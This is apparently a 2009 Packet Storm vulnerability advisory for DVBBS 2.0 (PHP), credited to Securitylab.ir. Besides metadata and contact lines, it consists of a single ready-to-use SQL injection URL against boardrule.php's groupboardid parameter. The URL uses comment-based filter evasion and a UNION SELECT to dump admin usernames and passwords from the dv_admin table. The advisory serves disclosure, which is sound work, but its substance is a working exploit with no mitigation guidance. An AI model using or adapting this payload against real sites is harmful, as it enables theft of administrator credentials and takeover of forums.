DVBBS 2.0 SQL Injection

2009-09-04T00:00:00
ID PACKETSTORM:80993
Type packetstorm
Reporter Securitylab Security Research
Modified 2009-09-04T00:00:00

Description

                                        
                                            `########################## Securitylab.ir ########################  
# Application Info:  
# Name: DVBBS (php)  
# Version: 2.0  
# Vendor: http://p.dvbbs.net  
#################################################################  
# Discoverd By: Securitylab.ir  
# Website: http://securitylab.ir  
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir  
#################################################################  
# Vulnerability Info:  
# Type: Sql Injection  
# Risk: Medium  
#===========================================================  
# http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/  
#===========================================================  
#################################################################  
# Securitylab Security Research Team  
###################################################################  
  
  
`